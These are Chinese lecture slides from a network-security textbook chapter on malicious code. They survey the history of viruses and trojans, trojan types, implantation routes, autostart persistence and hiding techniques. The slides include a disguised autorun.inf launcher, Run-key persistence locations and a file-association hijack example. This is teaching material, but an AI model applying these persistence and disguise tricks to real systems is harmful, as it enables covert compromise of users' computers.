《計算機網(wǎng)絡(luò)安全原理》第14章 惡意代碼

本PPT是電子工業(yè)出版社出版的教材《計算機網(wǎng)絡(luò)安全原理》配套教學PPT（部分內(nèi)容的深度和廣度在教材的基礎(chǔ)上有所擴展），作者：吳禮發(fā)本PPT可能直接或間接采用了網(wǎng)上資源、公開學術(shù)報告中的部分PPT頁面、圖片、文字，引用時我們力求在該PPT的備注欄或標題欄中注明出處，如果有疏漏之處，敬請諒解。同時對被引用資源或報告的作者表示誠摯的謝意！本PPT可免費使用、修改，使用時請保留此頁。聲明第十四章惡意代碼內(nèi)容提綱2木馬實現(xiàn)原理與攻擊技術(shù)3木馬實例4惡意代碼1木馬防御一、定義2000年以前：病毒時代背景：DOS退場，Windows9x/NT廣泛應(yīng)用，促進了網(wǎng)絡(luò)應(yīng)用進入日常生活中在DOS時代，感染式病毒（Virus）、蠕蟲（Worm）和特洛伊木馬（Trojan），都是相對窄帶而互斥的技術(shù)概念：Virus是主流惡意代碼概念的發(fā)展史類型定義特性計算機病毒在計算機程序中插入的破壞計算機功能并能自我復(fù)制的一組程序代碼。潛伏、傳染、破壞計算機蠕蟲通過計算機網(wǎng)絡(luò)自我復(fù)制，消耗系統(tǒng)資源和網(wǎng)絡(luò)資源的程序。掃描、攻擊、擴散特洛伊木馬指一種與遠程計算機建立連接，使遠程計算機能夠通過網(wǎng)絡(luò)控制本地計算機的程序。欺騙、隱蔽、信息竊取邏輯炸彈通過特殊的數(shù)據(jù)或時間作為條件觸發(fā)，試圖完成一定破壞功能的程序。潛伏、破壞RootKit指通過替代或者修改系統(tǒng)功能模塊，從而實現(xiàn)隱藏和創(chuàng)建后門的程序。隱蔽，潛伏惡意代碼概念的發(fā)展史2000~2005：蠕蟲大爆發(fā)時代Happy99蠕蟲利用劫持電子郵件的方式傳播并快速流行，拉開了蠕蟲時代大幕2011年：紅色代碼（CodeRed）及其變種“紅色代碼II”（CodeRedII）大爆發(fā)：掃描溢出型蠕蟲的典型代表惡意代碼概念的發(fā)展史2005~2010：木馬泛濫時代隨著端系統(tǒng)的安全性的提高（DEP、ALSR等技術(shù)的應(yīng)用），蠕蟲的影響開始減弱2005年，以灰鴿子、冰河為代表的遠程控制程序在技術(shù)上趨于成熟，感染數(shù)量持續(xù)增加2007~2009：地下經(jīng)濟運作日趨“成熟”，基于木馬的黑色產(chǎn)業(yè)鏈2007年上半年：毒王“AV終結(jié)者”惡意代碼概念的發(fā)展史2010~2020：虛擬貨幣和隱秘網(wǎng)絡(luò)帶動的勒索新對抗2013年開始，勒索軟件、挖礦木馬逐步泛濫2016：Mirai爆發(fā)，致癱Dyn2017：WannaCry全球大爆發(fā)2019：WannaMine挖礦木馬爆發(fā)惡意代碼概念的發(fā)展史惡意代碼

2007年下半年新增病毒的比例（瑞星）惡意代碼

2018年CNCERT中國互聯(lián)網(wǎng)網(wǎng)絡(luò)安全報告惡意代碼

2018年CNCERT中國互聯(lián)網(wǎng)網(wǎng)絡(luò)安全報告惡意代碼

2018年CNCERT中國互聯(lián)網(wǎng)網(wǎng)絡(luò)安全報告惡意代碼規(guī)模惡意代碼規(guī)模蠕蟲：主要利用網(wǎng)絡(luò)系統(tǒng)漏洞自動傳播蠕蟲木馬編寫者防火墻和其他安全設(shè)置希臘軍隊特洛伊城墻特洛伊木馬特洛伊木馬（TrojanHorse），簡稱木馬，“一經(jīng)潛入，后患無窮”RFC1244(1/2)RFC1244(RequestforComments:1244)中是這樣描述木馬的:

“木馬是一種程序，它能提供一些有用的，或是僅僅令人感興趣的功能，但是它還有用戶所不知道的其他功能，例如在你不了解的情況下拷貝文件或竊取你的密碼。”

RFC1244(2/2)RFC1244的定義雖然不十分完善，但是可以澄清一些模糊概念：首先木馬程序并不一定實現(xiàn)某種對用戶來說有意義或有幫助的功能，但卻會實現(xiàn)一些隱藏的、危險的功能；其次木馬所實現(xiàn)的主要功能并不為受害者所知，只有程序編制者最清楚。第三，這個定義暗示“有效負載”是惡意的。大多數(shù)安全專家對特洛伊木馬的定義目前，大多數(shù)安全專家統(tǒng)一認可的定義是:“特洛伊木馬是一段能實現(xiàn)有用的或必需的功能的程序，但是同時還完成一些不為人知的功能?！?/p>

木馬的危害目前木馬常被用作網(wǎng)絡(luò)系統(tǒng)入侵的重要工具和手段。木馬利用自身所具有的植入功能，或依附其它具有傳播能力的程序等多種途徑，進駐目標機器，搜集其中各種敏感信息，并通過網(wǎng)絡(luò)與外界通信，發(fā)回所搜集到的各種敏感信息，接受植入者指令，完成其它各種操作，如修改指定文件、格式化硬盤等。木馬的危害木馬程序具有很大的危害性，主要表現(xiàn)在:自動搜索已中木馬的計算機；管理對方資源，如復(fù)制文件、刪除文件、查看文件內(nèi)容、上傳文件、下載文件等；跟蹤監(jiān)視對方屏幕；直接控制對方的鍵盤、鼠標；隨意修改注冊表和系統(tǒng)文件；共享被控計算機的硬盤資源；監(jiān)視對方任務(wù)且可終止對方任務(wù)；遠程重啟和關(guān)閉機器。木馬規(guī)模木馬規(guī)模木馬規(guī)模二、木馬分類木馬的分類從木馬技術(shù)發(fā)展的歷程考慮，大致可以分為六代:第一代木馬是偽裝型病毒，將病毒偽裝成一個合法的程序讓用戶運行，例如1986年的PC-Write木馬；第二代木馬在隱藏、自啟動和操縱服務(wù)器等技術(shù)上有了很大的發(fā)展，可以進行密碼竊取、遠程控制，例如BO2000和冰河木馬；第三代木馬在連接方式上有了改進，利用端口反彈技術(shù)，例如灰鴿子木馬；木馬的分類從木馬技術(shù)發(fā)展的歷程考慮，大致可以分為六代:第四代木馬在進程隱藏方面做了較大的改動，讓木馬服務(wù)器運行時沒有進程，網(wǎng)絡(luò)操作插入到系統(tǒng)進程或者應(yīng)用進程中完成，例如廣外男生木馬。第五代是驅(qū)動級木馬，使用了大量Rootkit技術(shù)深入內(nèi)核空間來實現(xiàn)自身的深度隱藏，并且在目標系統(tǒng)中以內(nèi)核態(tài)運行，擁有感染后能針對殺毒軟件和網(wǎng)絡(luò)防火墻進行攻擊的系統(tǒng)特權(quán)，查殺難度較大。木馬的分類從木馬技術(shù)發(fā)展的歷程考慮，大致可以分為六代:隨著身份認證USBKey和殺毒軟件主動防御的興起，使用黏蟲技術(shù)和特殊反顯技術(shù)的第六代木馬逐漸系統(tǒng)化，前者主要以盜取和篡改用戶敏感信息為主，后者以動態(tài)口令和硬證書攻擊為主，PassCopy和暗黑蜘蛛俠是這類木馬的代表。木馬的分類從木馬所實現(xiàn)的功能角度可分為：破壞型密碼發(fā)送型遠程訪問型鍵盤記錄木馬DoS攻擊木馬代理木馬FTP木馬程序殺手木馬反彈端口型木馬(1)破壞型惟一的功能就是破壞并且刪除文件，如電腦上的DLL、INI、EXE文件或其它類型文件，造成系統(tǒng)損壞，用戶數(shù)據(jù)被破壞。功能簡單，容易實現(xiàn)，破壞性強。(2)密碼發(fā)送型找到隱藏密碼并把它們發(fā)送到指定的信箱。有人喜歡把自己的各種密碼以文件的形式存放在計算機中，認為這樣方便；還有人喜歡用WINDOWS提供的密碼記憶功能，這樣就可以不必每次都輸入密碼了。許多木馬可以尋找到這些敏感信息，把它們送到黑客手中。(3)遠程訪問型使用這類木馬，只需有人運行了服務(wù)端程序，如果客戶知道了服務(wù)端的IP地址，就可以實現(xiàn)遠程控制。這類程序可以實現(xiàn)觀察"受害者"正在干什么，當然這個程序完全可以用在正道上的，比如監(jiān)視學生機的操作。(4)鍵盤記錄木馬記錄受害者的（硬／軟）鍵盤敲擊并且在日志文件里查找可能的密碼。這種木馬隨著系統(tǒng)的啟動而啟動，有在線和離線記錄這樣的選項，分別記錄你在線和離線狀態(tài)下敲擊鍵盤時的按鍵情況。也就是說你按過什么按鍵，種植木馬的人都知道，從這些按鍵中他很容易就會得到你的密碼等有用信息!當然，對于這種類型的木馬，郵件發(fā)送功能也是必不可少的。(5)DoS攻擊木馬隨著DoS攻擊越來越廣泛的應(yīng)用，被用作DoS攻擊的木馬也越來越流行起來。這種木馬的危害不是體現(xiàn)在被感染計算機上，而是體現(xiàn)在攻擊者可以利用它來攻擊一臺又一臺計算機，給網(wǎng)絡(luò)造成很大的傷害和帶來損失。還有一種類似DoS的木馬叫做郵件炸彈木馬，一旦機器被感染，木馬就會隨機生成各種各樣主題的信件，對特定的郵箱不停地發(fā)送郵件，一直到對方癱瘓、不能接受郵件時為止。

(6)代理木馬黑客在入侵的同時掩蓋自己的足跡，謹防別人發(fā)現(xiàn)自己的身份是非常重要的。因此，給被控制的“肉雞”種上代理木馬，讓其變成攻擊者發(fā)動攻擊的跳板，就是代理木馬最重要的任務(wù)。通過代理木馬，攻擊者可以在匿名的情況下使用Telnet、ICQ、IRC等程序，從而隱蔽自己的蹤跡。(7)程序殺手木馬上面的木馬功能雖然形形色色，不過到了對方機器上要發(fā)揮自己的作用，還要過防木馬軟件這一關(guān)才行。常見的防木馬軟件有ZoneAlarm、NortonAnti-Virus等。程序殺手木馬的功能就是關(guān)閉對方機器上運行的這類程序，讓其他的木馬更好地發(fā)揮作用。(8)反彈端口型木馬木馬開發(fā)者在分析了防火墻的特性后發(fā)現(xiàn)：防火墻對于進入的鏈接往往會進行非常嚴格的過濾，但是對于出去的鏈接卻疏于防范。于是，與一般的普通木馬相反，反彈端口型木馬的服務(wù)端(被控制端)使用主動端口，客戶端(控制端)使用被動端口。（8）反彈端口型木馬反彈窗口木馬定時監(jiān)測控制端的存在，發(fā)現(xiàn)控制端上線，立即彈出端口主動連結(jié)控制端打開的被動端口；為了隱蔽起見，控制端的被動端口一般開在80，即使用戶使用掃描軟件檢查自己的端口，發(fā)現(xiàn)類似

TCPUserIP:1026ControllerIP:80ESTABLISHED

的情況，稍微疏忽一點，你就會以為是自己在瀏覽網(wǎng)頁。三、木馬特點木馬的特點一個典型的特洛伊木馬（程序）通常具有以下四個特點：有效性隱蔽性頑固性易植入性一個木馬的危害大小和清除難易程度可以從這四個方面來加以評估。有效性由于木馬常常構(gòu)成網(wǎng)絡(luò)入侵方法中的一個重要內(nèi)容，它運行在目標機器上就必須能夠?qū)崿F(xiàn)入侵者的某些企圖。因此有效性就是指入侵的木馬能夠與其控制端（入侵者）建立某種有效聯(lián)系，從而能夠充分控制目標機器并竊取其中的敏感信息。隱蔽性木馬必須有能力長期潛伏于目標機器中而不被發(fā)現(xiàn)。一個隱蔽性差的木馬往往會很容易暴露自己，進而被殺毒（或殺馬）軟件，甚至用戶手工檢查出來，這樣將使得這類木馬變得毫無價值。隱蔽性是木馬的生命。頑固性當木馬被檢查出來（失去隱蔽性）之后，為繼續(xù)確保其入侵有效性，木馬往往還具有另一個重要特性——頑固性。木馬頑固性就是指有效清除木馬的難易程度。若一個木馬在檢查出來之后，仍然無法將其一次性有效清除，那么該木馬就具有較強的頑固性。易植入性任何木馬必須首先能夠進入目標機器，因此易植入性就成為木馬有效性的先決條件。欺騙是自木馬誕生起最常見的植入手段，因此各種好用的小功能軟件就成為木馬常用的棲息地。利用系統(tǒng)漏洞進行木馬植入也是木馬入侵的一類重要途徑。目前木馬技術(shù)與蠕蟲技術(shù)的結(jié)合使得木馬具有類似蠕蟲的傳播性，這也就極大提高了木馬的易植入性。其它特點：自動運行通常木馬程序通過修改系統(tǒng)的配置文件或注冊表文件，在目標系統(tǒng)啟動時就自動加載運行。這種自動加載運行不需要客戶端干預(yù)，同時也不會被目標系統(tǒng)用戶所覺察。其它特點：欺騙性木馬程序要達到其長期隱蔽的目的，就必需采取各種各樣的欺騙手段，欺騙目標系統(tǒng)用戶，以防被發(fā)現(xiàn)。比如木馬程序經(jīng)常會采用一種文件名的欺騙手段，如exploer這樣的文件名，以此來與系統(tǒng)中的合法程序explorer相混淆。木馬的編制者還在不斷制造新的欺騙的手段，花樣層出不窮，讓人防不勝防。2023/11/24網(wǎng)絡(luò)入侵與防范講義48自動恢復(fù)現(xiàn)在很多木馬程序中的功能模塊已不再是由單一的文件組成，而是具有多重備份，可以相互恢復(fù)。計算機一旦感染上這種木馬程序，想單獨靠刪除某個文件來清除是不太可能的。其它特點：功能的特殊性通常木馬的功能都是十分特殊的，除了普通的文件操作以外，有些木馬具有搜索并發(fā)送目標主機中的口令、記錄用戶事件、進行鍵盤記錄、遠程注冊表操作以及鎖定鼠標等功能。其它特點近年來，木馬技術(shù)取得了較大的發(fā)展，目前已徹底擺脫了傳統(tǒng)模式下植入方法原始、通信方式單一、隱蔽性差等不足。借助一些新技術(shù)，木馬不再依賴于對用戶進行簡單的欺騙，也可以不必修改系統(tǒng)注冊表，不開新端口，不在磁盤上保留新文件，甚至可以沒有獨立的進程，這些新特點使對木馬的查殺變得愈加困難；但與此同時卻使得木馬的功能得到了大幅提升。采用了新技術(shù)的木馬可以輕易穿過防火墻與外界（入侵者）通信。

內(nèi)容提綱2木馬實現(xiàn)原理與攻擊技術(shù)3木馬實例4惡意代碼1木馬防御遠程控制木馬木馬體系結(jié)構(gòu)：C/S架構(gòu)，木馬程序+控制端程序木馬程序即是服務(wù)器端程序?？刂贫顺绦蜃鳛榭蛻舳耍糜诠粽哌h程控制被植入木馬的機器。遠程控制木馬與遠程控制軟件的區(qū)別?隱蔽性:木馬被隱藏，避免被發(fā)現(xiàn)；非授權(quán)性：木馬程序不經(jīng)授權(quán)控制主機遠程控制木馬的運行步驟遠程控制木馬進行網(wǎng)絡(luò)入侵的過程:配置木馬傳播木馬運行木馬信息反饋建立連接遠程控制遠程控制木馬的運行步驟配置木馬控制端服務(wù)端網(wǎng)絡(luò)配置木馬階段主要實現(xiàn)兩個功能：定制木馬：定制端口，確定木馬在哪個端口監(jiān)聽。信息反饋：設(shè)置信息反饋的方式。傳播木馬運行木馬信息反饋建立連接遠程控制通過各種傳播方式散播木馬（往往結(jié)合病毒的傳播手段，如電子郵件，網(wǎng)絡(luò)下載等等）遠程控制木馬的運行步驟控制端服務(wù)端配置木馬傳播木馬運行木馬信息反饋建立連接遠程控制木馬控制端木馬服務(wù)端InternetIntranet控制流圖5-6木馬的常規(guī)通信方式建立連接A控制端A服務(wù)端1037762676266016(1)建立連接前(2)獲取服務(wù)端IP(3)木馬連接建立通過信息反饋或IP掃描獲得服務(wù)器IP地址木馬端口（服務(wù)端IP）（控制端IP）服務(wù)端口58遠程控制木馬的運行步驟控制端服務(wù)端配置木馬傳播木馬運行木馬信息反饋建立連接遠程控制

遠程控制：竊取密碼文件操作修改注冊表系統(tǒng)操作10377626遠程控制木馬的反彈技術(shù)控制端感染木馬的主機優(yōu)點：解決動態(tài)IP地址的問題；解決內(nèi)網(wǎng)地址的問題；繞過防火墻的限制；缺點：容易暴露控制端反彈一、木馬植入技術(shù)植入技術(shù)木馬植入技術(shù)可以大概分為主動植入與被動植入兩類。主動植入，就是攻擊者主動將木馬程序種到本地或者是遠程主機上，這個行為過程完全由攻擊者主動掌握。被動植入，是指攻擊者預(yù)先設(shè)置某種環(huán)境，然后被動等待目標系統(tǒng)用戶的某種可能的操作，只有這種操作執(zhí)行，木馬程序才有可能植入目標系統(tǒng)。主動植入主動植入，一般需要通過某種方法獲取目標主機的一定權(quán)限，然后由攻擊者自己動手進行安裝。按照目標系統(tǒng)是本地還是遠程的區(qū)分，這種方法又有本地安裝與遠程安裝之分。主動植入由于在一個系統(tǒng)植入木馬，不僅需要將木馬程序上傳到目標系統(tǒng)，還需要在目標系統(tǒng)運行木馬程序；所以主動植入不僅需要具有目標系統(tǒng)的寫權(quán)限，還需要可執(zhí)行權(quán)限。如果僅僅具有寫權(quán)限，只能將木馬程序上傳但不能執(zhí)行，這種情況屬于被動植入，因為木馬仍然需要被動等待以某種方式被執(zhí)行。主動植入--本地安裝本地安裝就是直接在本地主機上進行安裝。一個人很難確保除了自己之外自己的計算機不會被其他人使用。而在經(jīng)常更換使用者的公共場所（如網(wǎng)吧、飯店、賓館、咖啡店等）的計算機上，這種安裝木馬的方法更是非常普遍、有效。主動植入--遠程安裝遠程安裝就是通過常規(guī)攻擊手段獲得目標主機的一定權(quán)限后，將木馬上傳到目標主機上，并使其運行起來。例如，某些系統(tǒng)漏洞的存在，使得攻擊者可以利用漏洞遠程將木馬程序上傳并執(zhí)行。從實現(xiàn)方式上，主要分為：利用系統(tǒng)自身漏洞植入利用第三方軟件漏洞植入利用系統(tǒng)自身漏洞植入這是一種主動攻擊的方式。攻擊者利用所了解的系統(tǒng)的安全漏洞及其特性主動出擊。如IIS服務(wù)器的溢出漏洞，通過一個“IISHack”的攻擊程序就可使IIS服務(wù)器崩潰，并同時在被攻擊服務(wù)器執(zhí)行“木馬”程序。MIME漏洞則是利用InternetExplorer在處理不正常的MIME類型存在的問題，攻擊者有意地更改MIME類型，使IE可以不提示用戶而直接運行電子郵件附件中的惡意程序等。利用第三方軟件漏洞植入每臺主機上都會安裝一些第三方軟件或者提供服務(wù)，但是這些軟件可能存在可被利用的漏洞，如果被惡意者利用，你的主機就可以成為木馬的“棲息地”。例如：AT-TFTPServer在處理帶有超長文件名參數(shù)的請求時存在漏洞，遠程攻擊者可能利用此漏洞在服務(wù)器上執(zhí)行任意指令。被動植入就目前的情況，被動植入技術(shù)主要是利用以下方式將木馬程序植入目標系統(tǒng)：網(wǎng)頁瀏覽植入利用電子郵件植入利用網(wǎng)絡(luò)下載植入利用即時通工具植入與其它程序捆綁利用移動存儲設(shè)備植入網(wǎng)頁瀏覽植入網(wǎng)頁瀏覽傳播：利用Script/ActiveX控件/JavaApplet等編寫出一個HTML網(wǎng)頁，當我們?yōu)g覽該頁面時，會在后臺將木馬程序下載到計算機緩存中，然后修改系統(tǒng)注冊表，使相關(guān)鍵值指向“木馬”程序。還可以利用瀏覽器的已知或者未知的漏洞，把木馬下載到本機并運行。水坑攻擊（Wateringhole）：在受害者必經(jīng)之路設(shè)置一個“水坑(陷阱)”。最常見的做法是，黑客分析攻擊目標的上網(wǎng)活動規(guī)律，尋找攻擊目標經(jīng)常訪問的網(wǎng)站的弱點，先將此網(wǎng)站“攻破”并植入攻擊代碼，一旦攻擊目標訪問該網(wǎng)站就會“中招”水坑攻擊2020.2.19：黑客利用后門對香港iOS用戶發(fā)起水坑攻擊水坑攻擊威瑞森的報告顯示，94%的惡意軟件通過電子郵件傳播，排名第一的社會工程攻擊是網(wǎng)絡(luò)釣魚利用電子郵件植入利用電子郵件植入電子郵件（E-mail）進行傳播：攻擊者將“木馬”程序偽裝成E-mail附件的形式發(fā)送出去，收信人只要查看郵件附件就會使“木馬”程序得到運行并安裝進入系統(tǒng)。通過在郵件內(nèi)容內(nèi)嵌WSH(WindowsScriptsHost)腳本，用戶不需要打開附件，僅僅瀏覽一下郵件的內(nèi)容，附件中的木馬就會被執(zhí)行。郵件木馬已經(jīng)從附件走到正文中了，有誰會收到郵件后連看都不看就刪除呢?例二例三網(wǎng)絡(luò)下載植入一些非正規(guī)的網(wǎng)站以提供軟件下載為名，將木馬程序偽裝成用戶所希望的其它軟件，當用戶下載安裝時，實際上所安裝的是木馬程序。利用即時通工具植入即時通工具有文件傳輸功能，所以現(xiàn)在也有很多木馬通過它傳播。惡意破壞者通常把木馬服務(wù)器程序通過合并軟件和其他的可執(zhí)行文件綁在一起，然后騙你說是一個好玩的東東或者是漂亮MM的照片，你接受后運行的話，你就成了木馬的犧牲品了。與其它程序捆綁將木馬與其它軟件捆綁，用戶在下載安裝其它軟件時就不自覺地也安裝了木馬，這種情況下用戶很難察覺。攻擊者還可以在.doc、.ppt、.rar、.zip、.mpg、.pdf等文件中插入惡意代碼，當用戶打開這些文檔時，就會被植入木馬。例：圖片木馬有一種圖片木馬，利用用戶認為圖片文件不可執(zhí)行，因此不可能是木馬這樣的心理來欺騙受害者。實際上這是一個后綴名的小把戲。由于Windows系統(tǒng)默認不顯示已經(jīng)注冊了的文件類型的后綴名，因此test.jpg.exe這種文件在系統(tǒng)上就顯示為test.jpg，木馬再采用和圖片文件一樣的圖標，對大多數(shù)用戶而言，是極具欺騙性的。利用移動存儲設(shè)備植入利用移動存儲設(shè)備傳播：利用Windows的Autoplay(autorun.inf)機制，當插入U盤、移動硬盤或者光盤時，可以自動執(zhí)行惡意程序。[AutoRun]open=scvhost.exeshellexecute=scvhost.exeshell\Auto\command=scvhost.exe“擺渡”木馬的運行①植入外網(wǎng)主機“擺渡”木馬的運行①植入外網(wǎng)主機②植入移動設(shè)備“擺渡”木馬的運行①植入外網(wǎng)主機②植入移動設(shè)備③植入內(nèi)網(wǎng)主機“擺渡”木馬的運行①植入外網(wǎng)主機②植入移動設(shè)備③植入內(nèi)網(wǎng)主機④敏感信息收集“擺渡”木馬的運行①植入外網(wǎng)主機②植入移動設(shè)備③植入內(nèi)網(wǎng)主機④敏感信息收集⑤敏感信息轉(zhuǎn)移“擺渡”木馬的運行①植入外網(wǎng)主機②植入移動設(shè)備③植入內(nèi)網(wǎng)主機④敏感信息收集⑤敏感信息轉(zhuǎn)移⑥敏感信息泄露2015.12.2夜間：安天監(jiān)控預(yù)警體系感知到如下線索：某知名作家在新浪微博發(fā)布消息，曝光有人以發(fā)送“采訪提綱”為借口，利用微博私信功能，發(fā)送惡意代碼鏈接。社會工程學2015.12.2夜間：安天監(jiān)控預(yù)警體系感知到如下線索：某知名作家在新浪微博發(fā)布消息，曝光有人以發(fā)送“采訪提綱”為借口，利用微博私信功能，發(fā)送惡意代碼鏈接。社會工程學社會工程學無論是原始微博截圖中的頭像、微博兩條搜索結(jié)果顯示的圖像，還是百度網(wǎng)盤的頭像，相似度都非常高，讓人真假難辨。社會工程學幸運的是，沒有微博名人中招！社會工程學社會工程學社會工程學二、木馬自動加載技術(shù)自動加載技術(shù)木馬程序在被植入目標主機后，不可能寄希望于用戶雙擊其圖標來運行啟動，只能不動聲色地自動啟動和運行，攻擊才能以此為依據(jù)侵入被侵主機，完成控制。自動加載技術(shù)在Windows系統(tǒng)中木馬程序的自動加載技術(shù)主要有：修改系統(tǒng)文件修改系統(tǒng)注冊表添加系統(tǒng)服務(wù)修改文件打開關(guān)聯(lián)屬性修改任務(wù)計劃修改組策略利用系統(tǒng)自動運行的程序修改啟動文件夾替換系統(tǒng)DLL(1)修改系統(tǒng)文件木馬程序一般會在第一次運行時，修改目標系統(tǒng)文件以達到自動加載的目的在早于WindwosXP版本的系統(tǒng)上，System.ini、Win.ini、Winstart.bat、Autoexec.bat等都是木馬所關(guān)注的配置文件。這些文件能自動被Windows在啟動時加載運行，木馬將自身程序加入此類批處理文件，能夠達成開機啟動的目標。這些文件雖然在后續(xù)版本的Windows系統(tǒng)上依然存在，但主要出于兼容早期系統(tǒng)的需要，很難再被木馬繼續(xù)利用(2)修改系統(tǒng)注冊表系統(tǒng)注冊表保存著系統(tǒng)的軟件、硬件及其它與系統(tǒng)配置有關(guān)的重要信息。在WinNT系列操作系統(tǒng)上，Windows主要使用注冊表存儲包括開機啟動項目的系統(tǒng)配置，修改注冊表隱蔽性相對較高，木馬常常采用這種方法實現(xiàn)開機自啟動。通常被攻擊者用作開機啟動的主鍵（在不同版本的系統(tǒng)中可能存在不同的主鍵）包括：(2)修改系統(tǒng)注冊表系統(tǒng)注冊表保存著系統(tǒng)的軟件、硬件及其它與系統(tǒng)配置有關(guān)的重要信息。HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run、Runonce、RunonceEx（在Win2000、WinXp中有效）、RunServices、RunServicesOnce等HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run、Runonce、RunonceEx、RunServices、RunServicesOnce等HKEY_USERS\[UserSID]\Software\Microsoft\Windows\CurrentVersion\Run、Runonce、RunonceEx、RunServices、RunServicesOnce等在上述主鍵中，HKEY_LOCAL_MACHINE對當前系統(tǒng)的所有用戶有效，HKEY_CURRENT_USER僅對當前登陸的用戶有效(2)修改系統(tǒng)注冊表系統(tǒng)注冊表保存著系統(tǒng)的軟件、硬件及其它與系統(tǒng)配置有關(guān)的重要信息。HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run、Runonce、RunonceEx（在Win2000、WinXp中有效）、RunServices、RunServicesOnce等HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run、Runonce、RunonceEx、RunServices、RunServicesOnce等HKEY_USERS\[UserSID]\Software\Microsoft\Windows\CurrentVersion\Run、Runonce、RunonceEx、RunServices、RunServicesOnce等在上述主鍵中，Runonce主鍵設(shè)置的自啟動程序?qū)⒃谙乱淮蜗到y(tǒng)啟動時獲得自動運行的機會，并在運行后從該主鍵移除。木馬程序如果利用這個主鍵進行自啟動，則木馬的運行通常有一個固定的操作，即需要在運行后重新將自身加入到Runonce主鍵中，確保自己在每次系統(tǒng)啟動時均獲得運行機會(3)添加系統(tǒng)服務(wù)WindowsNT內(nèi)核操作系統(tǒng)都大量使用服務(wù)來實現(xiàn)關(guān)鍵的系統(tǒng)功能。一些木馬將自身注冊為系統(tǒng)服務(wù)，并將相應(yīng)服務(wù)設(shè)置為系統(tǒng)開機時自啟動。例如，WindowsResourceKit工具包（其中包含的工具可能會根據(jù)用戶使用的Windows版本而有所不同）中的程序instsrv.exe常常被木馬用來創(chuàng)建系統(tǒng)服務(wù)，服務(wù)的管理和配置可以通過程序sc.exe來實施。這樣每當Windows系統(tǒng)啟動時，即使沒有用戶登錄，木馬也會自動開始工作。作為服務(wù)啟動的木馬往往隱蔽性更強，一般用戶很難從服務(wù)中找出木馬程序(4)修改文件打開關(guān)聯(lián)屬性通常，對于一些常用的文件如.txt文件，只要雙擊文件圖標就能打開這個文件。這是因為在系統(tǒng)注冊表中，已經(jīng)把這類文件與某個程序關(guān)聯(lián)起來，只要用戶雙擊該類文件，系統(tǒng)就自動啟動相關(guān)聯(lián)的程序來打開文件。修改文件打開關(guān)聯(lián)屬性是木馬程序的常用手段。比如：正常情況下.txt文件的打開方式為notepad.exe文件，而木馬可能將這類文件的關(guān)聯(lián)程序修改為木馬程序，這樣只要打開此類文件，就能在無意中啟動木馬。著名的國產(chǎn)木馬——冰河就是這樣做的。例：冰河的自動加載方法

HKEY_CLASSES_ROOT根鍵中記錄的是Windows操作系統(tǒng)中所有數(shù)據(jù)文件的信息，主要記錄不同文件的文件名后綴和與之對應(yīng)的應(yīng)用程序。

“冰河”就是通過修改HKEY_CLASSES_ROOT\txtfile\shell\open\command下的鍵值，將“C:\WINDOWS\NOTEPAD.EXE%1”

改為“C:\WINDOWS\SYSTEM\SYSEXPLR.EXE%1”，這樣一旦你雙擊一個TXT文件，原本應(yīng)用Notepad打開該文件的，現(xiàn)在卻變成啟動木馬程序了。

不同版本W(wǎng)indows系統(tǒng)的鍵名有差異！修改文件打開關(guān)聯(lián)不僅僅是TXT文件，其它諸如HTM、ZIP、RAR等都是木馬的目標，要小心。對付這類木馬，只能經(jīng)常檢查HKEY_CLASSES_ROOT\文件類型\shell\open\command主鍵，查看其鍵值是否正常。(5)修改任務(wù)計劃在默認情況下，任務(wù)計劃程序隨Windows一起啟動并在后臺運行。如果把某個程序添加到計劃任務(wù)文件夾，并將計劃任務(wù)設(shè)置為“系統(tǒng)啟動時”或“登錄時”，這樣也可以實現(xiàn)程序自啟動。Windows10WindowsXP(6)修改組策略在“開始”→“運行”中輸入“gpedit.msc"。按回車，打開系統(tǒng)組策略窗口，選擇“計算機配置”→“管理模板”→“系統(tǒng)”→“登錄”，雙擊右邊的“在用戶登錄時運行這些程序”項。修改組策略打開其屬性對話框，選擇“已啟用”，再單擊“顯示”，會彈出“顯示內(nèi)容”對話框，列表中顯示的便是藏身于此的自啟動程序。如果你也想在這里添加自啟動項目，可單擊“添加”在出現(xiàn)的“添加項目”對話框中輸入可執(zhí)行文件的完整路徑和文件名，“確定”即可。(7)修改啟動文件夾當前登陸用戶的“啟動”文件夾這是許多應(yīng)用軟件自啟動的常用位置。當前登陸用戶的“啟動”文件夾一般在：C:\DocumentsandSettings\<用戶名字>\「開始」菜單\程序\啟動\對所有用戶有效的啟動文件夾不管用戶用什么身份登錄系統(tǒng)，放入該文件夾的快捷方式總是自動啟動——這是它與用戶專有的啟動文件夾的區(qū)別所在。該文件夾一般在：C:\DocumentsandSettings\AllUsers\「開始」菜單\程序\啟動\(8)利用系統(tǒng)自動運行的程序在Windows系統(tǒng)中，有很多程序是可以自動運行的，如：在對磁盤進行格式化后，總是要運行“磁盤掃描”程序（Scandisk.exe）；按下F1鍵時，系統(tǒng)將運行Winhelp.exe或Hh.exe打開幫助文件；系統(tǒng)啟動時，將自動啟動系統(tǒng)欄程序SysTray.exe、注冊表檢查程序scanreg.exe、計劃任務(wù)程序mstask.exe、輸入法程序、電源管理程序等。這為惡意程序提供了機會，通過覆蓋相應(yīng)文件就可獲得自動啟動的機會，而不必修改系統(tǒng)任何設(shè)置。(9)替換系統(tǒng)DLL這種方法通過APIHOOK啟動，也稱為DLL陷阱技術(shù)。通過替換Windows系統(tǒng)中正常的DLL文件（動態(tài)鏈接文件），如kernel32.dll和user32.dll這些隨系統(tǒng)一起啟動的dll。啟動之后，如果是系統(tǒng)正常的調(diào)用請求，它就把請求轉(zhuǎn)到原先的DLL進行處理，如果是約定的木馬操作，則該DLL文件就實現(xiàn)木馬服務(wù)器端的功能。有些木馬需要系統(tǒng)重啟后運行或提升權(quán)限，如何做到？（10）其它三、木馬隱藏技術(shù)木馬的隱藏技術(shù)木馬的隱藏技術(shù)：木馬文件隱藏圖標隱藏進程隱藏通信隱藏隱藏技術(shù)想要隱藏木馬的服務(wù)端，可以是偽隱藏，也可以是真隱藏。偽隱藏是指程序的進程仍然存在，只不過是讓它消失在進程列表里。真隱藏則是讓程序徹底的消失，不以一個進程或者服務(wù)的方式工作。隱藏技術(shù)設(shè)置窗口不可見

(從任務(wù)欄中隱藏)把木馬程序注冊為服務(wù)

(從進程列表中隱藏)欺騙查看進程的函數(shù)

(從進程列表中隱藏)使用可變的高端口

